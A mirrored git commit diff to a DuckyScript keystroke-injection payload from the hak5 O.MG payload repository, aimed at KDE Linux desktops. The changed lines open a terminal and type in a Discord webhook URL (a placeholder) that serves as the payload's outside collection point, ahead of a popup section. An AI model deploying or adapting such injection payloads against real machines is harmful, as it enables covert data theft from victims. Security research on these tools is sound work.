mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
af4a7b779d
commit
7d3e33237b
|
@ -13,20 +13,17 @@ REM - Internet Connection
|
|||
REM - Discord webhook
|
||||
REM - KDE/kdialog based
|
||||
|
||||
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
DEFINE #WEBHOOK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### POPUP SECTION ####
|
||||
|
||||
|
||||
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
DEFINE WEBHOOK example.com
|
||||
STRING WEBHOOK_URL="
|
||||
STRING WEBHOOK
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN WEBHOOK_URL="#WEBHOOK"
|
||||
DELAY 500
|
||||
|
||||
REM All-in-one is important
|
||||
|
|
Loading…
Reference in New Issue